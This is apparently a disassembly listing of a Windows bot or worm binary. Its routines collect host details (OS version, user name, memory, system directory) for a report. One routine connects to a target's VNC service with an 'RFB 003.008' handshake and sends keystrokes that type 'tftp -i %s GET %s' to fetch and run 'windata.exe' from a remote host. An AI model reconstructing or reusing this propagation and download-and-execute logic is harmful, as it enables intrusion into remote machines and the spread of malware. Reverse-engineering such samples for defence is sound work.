loc_41D6CB: ; CODE XREF: sub_41D6C3+2F�j
; sub_41D6C3+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call ds:dword_42B014 ; Sleep
rdtsc
push 0
sub eax, esi
push edi
sbb edx, ebx
push edx
push eax
call sub_420C80
mov esi, edx
test esi, esi
mov ebx, eax
ja short loc_41D6CB
jb short loc_41D6FA
cmp ebx, edi
ja short loc_41D6CB
loc_41D6FA: ; CODE XREF: sub_41D6C3+31�j
push 0
push 64h
push esi
push ebx
call sub_420C00
mov ecx, edx
push 64h
xor edx, edx
test ecx, ecx
mov edi, eax
pop eax
ja short loc_41D76D
jb short loc_41D719
cmp edi, 50h
jnb short loc_41D71E
loc_41D719: ; CODE XREF: sub_41D6C3+4F�j
push 4Bh
pop eax
xor edx, edx
loc_41D71E: ; CODE XREF: sub_41D6C3+54�j
test ecx, ecx
ja short loc_41D76D
jb short loc_41D729
cmp edi, 47h
jnb short loc_41D72E
loc_41D729: ; CODE XREF: sub_41D6C3+5F�j
push 42h
pop eax
xor edx, edx
loc_41D72E: ; CODE XREF: sub_41D6C3+64�j
test ecx, ecx
ja short loc_41D76D
jb short loc_41D739
cmp edi, 37h
jnb short loc_41D73E
loc_41D739: ; CODE XREF: sub_41D6C3+6F�j
push 32h
pop eax
xor edx, edx
loc_41D73E: ; CODE XREF: sub_41D6C3+74�j
test ecx, ecx
ja short loc_41D76D
jb short loc_41D749
cmp edi, 26h
jnb short loc_41D74E
loc_41D749: ; CODE XREF: sub_41D6C3+7F�j
push 21h
pop eax
xor edx, edx
loc_41D74E: ; CODE XREF: sub_41D6C3+84�j
test ecx, ecx
ja short loc_41D76D
jb short loc_41D759
cmp edi, 1Eh
jnb short loc_41D75E
loc_41D759: ; CODE XREF: sub_41D6C3+8F�j
push 19h
pop eax
xor edx, edx
loc_41D75E: ; CODE XREF: sub_41D6C3+94�j
test ecx, ecx
ja short loc_41D76D
jb short loc_41D769
cmp edi, 0Ah
jnb short loc_41D76D
loc_41D769: ; CODE XREF: sub_41D6C3+9F�j
xor eax, eax
xor edx, edx
loc_41D76D: ; CODE XREF: sub_41D6C3+4D�j
; sub_41D6C3+5D�j ...
sub eax, edi
sbb edx, ecx
add eax, ebx
pop edi
adc edx, esi
pop esi
pop ebx
retn
sub_41D6C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_41D779 proc near ; CODE XREF: sub_40274D+2565�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 7E8h
push ebx
push esi
push edi
lea eax, [ebp+70h+var_CC]
push eax
mov [ebp+70h+var_4], offset byte_42B633
mov [ebp+70h+var_CC], 94h
call ds:dword_42B064 ; GetVersionExA
xor ebx, ebx
cmp [ebp+70h+var_C8], 4
jnz short loc_41D7EA
cmp [ebp+70h+var_C4], ebx
jnz short loc_41D7CC
cmp [ebp+70h+var_BC], 1
jnz short loc_41D7B9
mov [ebp+70h+var_4], offset a95 ; "95"
loc_41D7B9: ; CODE XREF: sub_41D779+37�j
cmp [ebp+70h+var_BC], 2
jnz loc_41D850
mov [ebp+70h+var_4], offset aNt_0 ; "NT"
jmp short loc_41D827
; ---------------------------------------------------------------------------
loc_41D7CC: ; CODE XREF: sub_41D779+31�j
cmp [ebp+70h+var_C4], 0Ah
jnz short loc_41D7DB
mov [ebp+70h+var_4], offset a98 ; "98"
jmp short loc_41D821
; ---------------------------------------------------------------------------
loc_41D7DB: ; CODE XREF: sub_41D779+57�j
cmp [ebp+70h+var_C4], 5Ah
jnz short loc_41D81A
mov [ebp+70h+var_4], offset aMe_0 ; "ME"
jmp short loc_41D821
; ---------------------------------------------------------------------------
loc_41D7EA: ; CODE XREF: sub_41D779+2C�j
cmp [ebp+70h+var_C8], 5
jnz short loc_41D81A
cmp [ebp+70h+var_C4], ebx
jnz short loc_41D7FE
mov [ebp+70h+var_4], offset a2k ; "2K"
jmp short loc_41D821
; ---------------------------------------------------------------------------
loc_41D7FE: ; CODE XREF: sub_41D779+7A�j
cmp [ebp+70h+var_C4], 1
jnz short loc_41D80D
mov [ebp+70h+var_4], offset aXp_0 ; "XP"
jmp short loc_41D821
; ---------------------------------------------------------------------------
loc_41D80D: ; CODE XREF: sub_41D779+89�j
cmp [ebp+70h+var_C4], 2
mov [ebp+70h+var_4], offset a2003 ; "2003"
jz short loc_41D821
loc_41D81A: ; CODE XREF: sub_41D779+66�j
; sub_41D779+75�j
mov [ebp+70h+var_4], offset a??? ; "???"
loc_41D821: ; CODE XREF: sub_41D779+60�j
; sub_41D779+6F�j ...
cmp [ebp+70h+var_BC], 2
jnz short loc_41D850
loc_41D827: ; CODE XREF: sub_41D779+51�j
cmp [ebp+70h+var_B8], bl
jz short loc_41D850
lea eax, [ebp+70h+var_B8]
push eax
push [ebp+70h+var_4]
lea eax, [ebp+70h+var_2E8]
push offset aSS_4 ; "%s (%s)"
push eax
call sub_41E6A6
lea eax, [ebp+70h+var_2E8]
add esp, 10h
mov [ebp+70h+var_4], eax
loc_41D850: ; CODE XREF: sub_41D779+44�j
; sub_41D779+AC�j ...
push 3Fh
pop ecx
xor eax, eax
mov [ebp+70h+var_25C], cx
lea edi, [ebp+70h+var_25A]
rep stosd
stosw
mov eax, ds:dword_444198
cmp eax, ebx
mov [ebp+70h+var_C], 100h
jz short loc_41D883
lea ecx, [ebp+70h+var_C]
push ecx
lea ecx, [ebp+70h+var_25C]
push ecx
call eax ; GetUserNameA
loc_41D883: ; CODE XREF: sub_41D779+FB�j
push [ebp+70h+arg_4]
call sub_4023C9
pop ecx
push eax
call ds:dword_44417C ; inet_addr
push 2
mov [ebp+70h+var_8], eax
push 4
lea eax, [ebp+70h+var_8]
push eax
call ds:dword_4441FC ; gethostbyaddr
cmp eax, ebx
jz short loc_41D8AC
push dword ptr [eax]
jmp short loc_41D8B1
; ---------------------------------------------------------------------------
loc_41D8AC: ; CODE XREF: sub_41D779+12D�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_41D8B1: ; CODE XREF: sub_41D779+131�j
lea eax, [ebp+70h+var_3E4]
push eax
call sub_41E6A6
pop ecx
pop ecx
push 104h
lea eax, [ebp+70h+var_4E8]
push eax
call ds:dword_42B010 ; GetSystemDirectoryA
push 46h
lea eax, [ebp+70h+var_114]
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_42B0C4 ; GetDateFormatA
push 46h
lea eax, [ebp+70h+var_15C]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_42B0C0 ; GetTimeFormatA
push 20h
lea eax, [ebp+70h+var_38]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+70h+var_38]
push eax
call ds:dword_42B134 ; GlobalMemoryStatus
push ebx
push ebx
push ebx
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
call sub_41ED01
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_7E8]
push eax
call sub_419549
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+70h+var_668]
push ebx
rep movsd
call sub_41D5F8
add esp, 20h
push eax
lea eax, [ebp+70h+var_15C]
push eax
lea eax, [ebp+70h+var_114]
push eax
lea eax, [ebp+70h+var_25C]
push eax
push [ebp+70h+arg_4]
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+70h+var_3E4]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
push [ebp+70h+var_C0]
lea eax, [ebp+70h+var_5E8]
push [ebp+70h+var_C4]
push [ebp+70h+var_C8]
push [ebp+70h+var_4]
push eax
lea eax, [ebp+70h+var_568]
push eax
mov eax, [ebp+70h+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_419443
pop ecx
pop ecx
push eax
mov eax, [ebp+70h+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_419443
pop ecx
pop ecx
push eax
call sub_41D6C3
push edx
push eax
push offset dword_439160
push 200h
push [ebp+70h+arg_0]
call sub_41E6FE
mov eax, [ebp+70h+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
add ebp, 70h
leave
retn
sub_41D779 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_41D9E5 proc near ; CODE XREF: sub_40274D+2593�p
; sub_40274D+6F0C�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+6Ch+var_8C]
push 0
push eax
call sub_41E5F0
add esp, 0Ch
cmp ds:dword_44428C, 0
jnz short loc_41DA52
push 0
push esi
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_C]
push eax
call ds:dword_44425C ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_41DA33
lea eax, [ebp+6Ch+var_8C]
push offset aNotConnected ; "Not connected"
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_41DA33: ; CODE XREF: sub_41D9E5+3C�j
test [ebp+6Ch+var_C], 1
lea eax, [ebp+6Ch+var_8]
jz short loc_41DA4B
push offset aDialUp ; "Dial-up"
loc_41DA41: ; CODE XREF: sub_41D9E5+6B�j
push eax
call sub_41E6A6
pop ecx
pop ecx
jmp short loc_41DA6E
; ---------------------------------------------------------------------------
loc_41DA4B: ; CODE XREF: sub_41D9E5+55�j
push offset off_4392B0
jmp short loc_41DA41
; ---------------------------------------------------------------------------
loc_41DA52: ; CODE XREF: sub_41D9E5+27�j
mov esi, offset off_4392AC
lea eax, [ebp+6Ch+var_8]
push esi
push eax
call sub_41E6A6
lea eax, [ebp+6Ch+var_8C]
push esi
push eax
call sub_41E6A6
add esp, 10h
loc_41DA6E: ; CODE XREF: sub_41D9E5+64�j
push [ebp+6Ch+arg_4]
push [ebp+6Ch+arg_8]
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_8]
push eax
push offset dword_439268
push 200h
push [ebp+6Ch+arg_0]
call sub_41E6FE
mov eax, [ebp+6Ch+arg_0]
add esp, 1Ch
pop esi
add ebp, 6Ch
leave
retn
sub_41D9E5 endp
; ---------------------------------------------------------------------------
byte_41DAA1 db 55h, 8Dh, 6Ch ; DATA XREF: sub_40274D+7345�o
dd 0EC818C24h, 65Ch, 537C458Bh, 656A5756h, 8DF08B59h, 0FFFD18BDh
dd 33A5F3FFh, 0BFDB33F6h, 80h, 0B0895746h, 190h, 0FF2C858Dh
dd 5053FFFFh, 896C5D89h, 45C7705Dh, 43939C68h, 0B06E800h
dd 8D570000h, 0FFFEAC85h, 0E85053FFh, 0AF8h, 0AC458D57h
dd 0EDE85053h, 6800000Ah, 100h, 0FA18858Dh, 5053FFFFh
dd 0ADBE8h, 5F3C6A00h, 2C458D57h, 0CDE85053h, 8300000Ah
dd 458D3CC4h, 858D502Ch, 0FFFFFD1Ch, 7D895053h, 4075892Ch
dd 894C7589h, 75895475h, 67AE85Ch, 50590000h, 0FD1C858Dh
dd 0FF50FFFFh, 44407015h, 75C08500h, 18858D18h, 68FFFFFBh
dd 439380h, 0B3CE850h, 0F38B0000h, 0EFE9h, 405D3900h, 75FF1576h
dd 2C858D40h, 0FFFFFFFFh, 0E8503C75h, 0CD8h, 390CC483h
dd 0B70F4C5Dh, 15764475h, 8D4C75FFh, 0FFFEAC85h, 4875FFFFh
dd 0CBAE850h, 0C4830000h, 545D390Ch, 75FF1276h, 0AC458D54h
dd 505075FFh, 0CA3E8h, 0CC48300h, 765C5D39h, 5C75FF15h
dd 0FA18858Dh, 75FFFFFFh, 89E85058h, 8300000Ch, 53530CC4h
dd 458D036Ah, 858D50ACh, 0FFFFFEACh, 858D5650h, 0FFFFFF2Ch
dd 5435FF50h, 0FF004442h, 44413C15h, 3BF08B00h, 680775F3h
dd 439354h, 68534AEBh, 200h, 5068458Dh, 0FD9C858Dh, 5350FFFFh
dd 0FA18858Dh, 5350FFFFh, 2C15FF56h, 3B004441h, 704589C3h
dd 24680775h, 0EB004393h, 5353531Bh, 15FF5053h, 444258h
dd 774C085h, 43930868h, 6805EB00h, 4392CCh, 0FB18858Dh
dd 0E850FFFFh, 0A46h, 0FEA09D39h, 5959FFFFh, 0FF532375h
dd 0FFFEA4B5h, 18858DFFh, 50FFFFFBh, 0FE1C858Dh, 0FF50FFFFh
dd 0FFFD18B5h, 35B1E8FFh, 0C483FFFEh, 18858D14h, 50FFFFFBh
dd 0FFA0D7E8h, 0FF5659FFh, 44416415h, 7075FF00h, 416415FFh
dd 0B5FF0044h, 0FFFFFE9Ch, 0FED494E8h, 0FF5359FFh, 42B06815h
db 0, 0CCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DCBE proc near ; CODE XREF: seg000:0041DEEA�p
; seg000:0041DF08�p ...
var_1C = byte ptr -1Ch
var_14 = byte ptr -14h
var_C = word ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov esi, offset dword_4393A8
lea edi, [ebp+var_14]
movsd
movsb
mov esi, offset dword_4393A0
lea edi, [ebp+var_1C]
movsd
xor ebx, ebx
cmp eax, ebx
mov [ebp+var_4], 4
mov [ebp+var_C], 1
mov [ebp+var_8], bx
movsw
jnz short loc_41DD74
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+arg_8], ebx
loc_41DCFE: ; CODE XREF: sub_41DCBE+B2�j
mov eax, [ebp+arg_8]
sub eax, ebx
jz short loc_41DD1B
dec eax
jnz short loc_41DD69
push ebx
push 1
lea eax, [ebp+var_4]
push eax
push esi
call ds:dword_4441A0 ; send
lea eax, [ebp+var_8]
jmp short loc_41DD2C
; ---------------------------------------------------------------------------
loc_41DD1B: ; CODE XREF: sub_41DCBE+45�j
push ebx
push 1
lea eax, [ebp+var_4]
push eax
push esi
call ds:dword_4441A0 ; send
lea eax, [ebp+var_C]
loc_41DD2C: ; CODE XREF: sub_41DCBE+5B�j
push ebx
push 1
push eax
push esi
call ds:dword_4441A0 ; send
push edi
call sub_41E1C0
cmp eax, 2
pop ecx
push ebx
jnz short loc_41DD4B
push 4
lea eax, [ebp+var_14]
jmp short loc_41DD50
; ---------------------------------------------------------------------------
loc_41DD4B: ; CODE XREF: sub_41DCBE+84�j
push 5
lea eax, [ebp+var_1C]
loc_41DD50: ; CODE XREF: sub_41DCBE+8B�j
push eax
push esi
call ds:dword_4441A0 ; send
push ebx
push edi
call sub_41E1C0
pop ecx
push eax
push edi
push esi
call ds:dword_4441A0 ; send
loc_41DD69: ; CODE XREF: sub_41DCBE+48�j
inc [ebp+arg_8]
cmp [ebp+arg_8], 1
jle short loc_41DCFE
jmp short loc_41DDE7
; ---------------------------------------------------------------------------
loc_41DD74: ; CODE XREF: sub_41DCBE+35�j
dec eax
jz short loc_41DD90
dec eax
jnz short loc_41DDE7
mov esi, [ebp+arg_0]
push ebx
push 1
lea eax, [ebp+var_4]
push eax
push esi
call ds:dword_4441A0 ; send
lea eax, [ebp+var_8]
jmp short loc_41DDA4
; ---------------------------------------------------------------------------
loc_41DD90: ; CODE XREF: sub_41DCBE+B7�j
mov esi, [ebp+arg_0]
push ebx
push 1
lea eax, [ebp+var_4]
push eax
push esi
call ds:dword_4441A0 ; send
lea eax, [ebp+var_C]
loc_41DDA4: ; CODE XREF: sub_41DCBE+D0�j
push ebx
push 1
push eax
push esi
call ds:dword_4441A0 ; send
push [ebp+arg_4]
call sub_41E1C0
cmp eax, 2
pop ecx
push ebx
jnz short loc_41DDC5
push 4
lea eax, [ebp+var_14]
jmp short loc_41DDCA
; ---------------------------------------------------------------------------
loc_41DDC5: ; CODE XREF: sub_41DCBE+FE�j
push 5
lea eax, [ebp+var_1C]
loc_41DDCA: ; CODE XREF: sub_41DCBE+105�j
push eax
push esi
call ds:dword_4441A0 ; send
push ebx
push [ebp+arg_4]
call sub_41E1C0
pop ecx
push eax
push [ebp+arg_4]
push esi
call ds:dword_4441A0 ; send
loc_41DDE7: ; CODE XREF: sub_41DCBE+B4�j
; sub_41DCBE+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DCBE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8Ch
push ebx
push esi
push edi
mov esi, offset aRfb003_008 ; "RFB 003.008\n"
lea edi, [ebp-3Ch]
movsd
movsd
movsd
movsb
mov esi, offset dword_4393D0
lea edi, [ebp-24h]
movsw
movsb
mov esi, offset dword_4393A8
lea edi, [ebp-2Ch]
movsd
movsb
mov esi, offset dword_4393CC
lea edi, [ebp-18h]
movsw
movsb
mov esi, offset dword_4393C8
lea edi, [ebp-10h]
movsw
xor ebx, ebx
push ebx
push 1
movsb
push 2
mov word ptr [ebp-14h], 1
mov word ptr [ebp-20h], 1
mov word ptr [ebp-1Ch], 72h
xor edi, edi
call ds:dword_444100 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp-8], esi
jnz short loc_41DE61
push eax
call ds:dword_444218 ; closesocket
loc_41DE61: ; CODE XREF: seg000:0041DE58�j
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-4Ch], 2
call ds:dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-48h], eax
call ds:dword_444260 ; htons
mov [ebp-4Ah], ax
push 10h
lea eax, [ebp-4Ch]
push eax
push esi
call ds:dword_4440AC ; connect
test eax, eax
jnz loc_41E113
jmp loc_41E18C
; ---------------------------------------------------------------------------
loc_41DE9E: ; CODE XREF: seg000:0041E1B1�j
cmp eax, 0FFFFFFFFh
jz short loc_41DED5
mov eax, edi
sub eax, ebx
jz loc_41E153
dec eax
jz loc_41E121
dec eax
jnz loc_41E183
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-8Ch]
push eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_41E113
loc_41DED5: ; CODE XREF: seg000:0041DEA1�j
; seg000:0041E186�j ...
push ebx
push 1
lea eax, [ebp-20h]
push eax
push esi
call ds:dword_4441A0 ; send
push 1
lea eax, [ebp-18h]
push eax
push esi
call sub_41DCBE
mov esi, ds:dword_42B014
add esp, 0Ch
mov edi, 3E8h
push edi
call esi ; Sleep
push ebx
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 0Ch
push edi
call esi ; Sleep
push 2
lea eax, [ebp-18h]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 0Ch
push edi
call esi ; Sleep
push offset byte_4434E0
mov [ebp-4], ebx
call sub_41E1C0
test eax, eax
pop ecx
mov ebx, offset aC_2 ; "%c"
jbe short loc_41DF7D
loc_41DF3E: ; CODE XREF: seg000:0041DF7B�j
mov eax, [ebp-4]
movsx eax, ds:byte_4434E0[eax]
push eax
push ebx
lea eax, [ebp-0Ch]
push 3
push eax
call sub_41E6FE
push 0
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-4]
push offset byte_4434E0
call sub_41E1C0
cmp [ebp-4], eax
pop ecx
jb short loc_41DF3E
loc_41DF7D: ; CODE XREF: seg000:0041DF3C�j
push 0
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 0Ch
push 7D0h
call esi ; Sleep
push 100h
push 0
push offset byte_4E27F0
call sub_41E5F0
add esp, 0Ch
push offset aWindata_exe ; "windata.exe"
push dword ptr [ebp+8]
call sub_4023C9
pop ecx
push eax
push offset aTftpISGetS ; "tftp -i %s GET %s"
push 0FFh
push offset byte_4E27F0
call sub_41E6FE
and dword ptr [ebp-4], 0
push offset byte_4E27F0
call sub_41E1C0
add esp, 18h
test eax, eax
jbe short loc_41E020
loc_41DFE1: ; CODE XREF: seg000:0041E01E�j
mov eax, [ebp-4]
movsx eax, ds:byte_4E27F0[eax]
push eax
push ebx
lea eax, [ebp-0Ch]
push 3
push eax
call sub_41E6FE
push 0
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-4]
push offset byte_4E27F0
call sub_41E1C0
cmp [ebp-4], eax
pop ecx
jb short loc_41DFE1
loc_41E020: ; CODE XREF: seg000:0041DFDF�j
push edi
call esi ; Sleep
push 0
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 0Ch
push 7530h
call esi ; Sleep
and dword ptr [ebp-4], 0
push offset aWindata_exe ; "windata.exe"
call sub_41E1C0
test eax, eax
pop ecx
jbe short loc_41E08D
loc_41E04E: ; CODE XREF: seg000:0041E08B�j
mov eax, [ebp-4]
movsx eax, byte ptr ds:aWindata_exe[eax] ; "windata.exe"
push eax
push ebx
lea eax, [ebp-0Ch]
push 3
push eax
call sub_41E6FE
push 0
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-4]
push offset aWindata_exe ; "windata.exe"
call sub_41E1C0
cmp [ebp-4], eax
pop ecx
jb short loc_41E04E
loc_41E08D: ; CODE XREF: seg000:0041E04C�j
push edi
call esi ; Sleep
push 0
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
and dword ptr [ebp-4], 0
mov edi, offset aExit ; "exit"
push edi
call sub_41E1C0
add esp, 10h
test eax, eax
jbe short loc_41E0EF
loc_41E0B4: ; CODE XREF: seg000:0041E0ED�j
mov eax, [ebp-4]
movsx eax, byte ptr ds:aExit[eax] ; "exit"
push eax
push ebx
lea eax, [ebp-0Ch]
push 3
push eax
call sub_41E6FE
push 0
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-4]
push edi
call sub_41E1C0
cmp [ebp-4], eax
pop ecx
jb short loc_41E0B4
loc_41E0EF: ; CODE XREF: seg000:0041E0B2�j
push 2
pop edi
loc_41E0F2: ; CODE XREF: seg000:0041E10B�j
push 258h
call esi ; Sleep
push 0
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 0Ch
dec edi
jnz short loc_41E0F2
mov esi, [ebp-8]
xor ebx, ebx
inc ebx
loc_41E113: ; CODE XREF: seg000:0041DE93�j
; seg000:0041DECF�j ...
push esi
call ds:dword_444218 ; closesocket
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41E121: ; CODE XREF: seg000:0041DEAE�j
lea eax, [ebp-24h]
push eax
lea eax, [ebp-8Ch]
push eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_41E113
lea eax, [ebp-14h]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp-14h]
push eax
push esi
call ds:dword_4441A0 ; send
push 2
pop edi
jmp short loc_41E18C
; ---------------------------------------------------------------------------
loc_41E153: ; CODE XREF: seg000:0041DEA7�j
lea eax, [ebp-3Ch]
push eax
lea eax, [ebp-8Ch]
push eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_41E113
lea eax, [ebp-3Ch]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp-3Ch]
push eax
push esi
call ds:dword_4441A0 ; send
xor edi, edi
inc edi
loc_41E183: ; CODE XREF: seg000:0041DEB5�j
cmp edi, 3
jz loc_41DED5
loc_41E18C: ; CODE XREF: seg000:0041DE99�j
; seg000:0041E151�j
push 40h
lea eax, [ebp-8Ch]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
push ebx
push 40h
lea eax, [ebp-8Ch]
push eax
push esi
call ds:dword_444064 ; recv
cmp eax, ebx
jg loc_41DE9E
jmp loc_41DED5
; ---------------------------------------------------------------------------
dd 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
sub_41E1C0 proc near ; CODE XREF: sub_401000+38�p
; sub_4011F5+2D�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_41E1F0
loc_41E1CC: ; CODE XREF: sub_41E1C0+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_41E223
test ecx, 3
jnz short loc_41E1CC
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_41E1F0: ; CODE XREF: sub_41E1C0+A�j
; sub_41E1C0+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41E1F0
mov eax, [ecx-4]
test al, al
jz short loc_41E241
test ah, ah
jz short loc_41E237
test eax, 0FF0000h
jz short loc_41E22D
test eax, 0FF000000h
jz short loc_41E223
jmp short loc_41E1F0
; ---------------------------------------------------------------------------
loc_41E223: ; CODE XREF: sub_41E1C0+13�j
; sub_41E1C0+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41E22D: ; CODE XREF: sub_41E1C0+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41E237: ; CODE XREF: sub_41E1C0+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41E241: ; CODE XREF: sub_41E1C0+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_41E1C0 endp
; =============== S U B R O U T I N E =======================================
sub_41E24B proc near ; CODE XREF: sub_40274D+55FC�p
; sub_40274D+71BC�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
push edi
or edi, 0FFFFFFFFh
test al, 40h
jz short loc_41E260
or eax, 0FFFFFFFFh
jmp short loc_41E29A
; ---------------------------------------------------------------------------
loc_41E260: ; CODE XREF: sub_41E24B+E�j
test al, 83h
jz short loc_41E298
push esi
call sub_420FC7
push esi
mov edi, eax
call sub_420F9C
push dword ptr [esi+10h]
call sub_420EE9
add esp, 0Ch
test eax, eax
jge short loc_41E286
or edi, 0FFFFFFFFh
jmp short loc_41E298
; ---------------------------------------------------------------------------
loc_41E286: ; CODE XREF: sub_41E24B+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_41E298
push eax
call sub_41E2A1
and dword ptr [esi+1Ch], 0
pop ecx
loc_41E298: ; CODE XREF: sub_41E24B+17�j
; sub_41E24B+39�j ...
mov eax, edi
loc_41E29A: ; CODE XREF: sub_41E24B+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_41E24B endp
; =============== S U B R O U T I N E =======================================
sub_41E2A1 proc near ; CODE XREF: sub_4022F5+BC�p
; sub_40AE18+5E�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_41E2D7
cmp ds:dword_4E2F00, 3
push esi
jnz short loc_41E2C9
call sub_421188
test eax, eax
pop ecx
push esi
jz short loc_41E2C9
push eax
call sub_4211B3
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E2C9: ; CODE XREF: sub_41E2A1+11�j
; sub_41E2A1+1C�j
push 0
push ds:dword_4E2EFC
call ds:dword_42B0E0 ; RtlFreeHeap
loc_41E2D7: ; CODE XREF: sub_41E2A1+7�j
pop esi
retn
sub_41E2A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E2D9 proc near ; CODE XREF: seg000:00411ACB�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
test edi, edi
mov ecx, edi
mov [ebp+var_8], edi
mov [ebp+arg_0], ecx
jnz short loc_41E2FD
xor eax, eax
jmp loc_41E3A8
; ---------------------------------------------------------------------------
loc_41E2FD: ; CODE XREF: sub_41E2D9+1B�j
push esi
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_41E311
mov eax, [esi+18h]
mov [ebp+var_4], eax
jmp short loc_41E31D
; ---------------------------------------------------------------------------
loc_41E311: ; CODE XREF: sub_41E2D9+2E�j
mov [ebp+var_4], 1000h
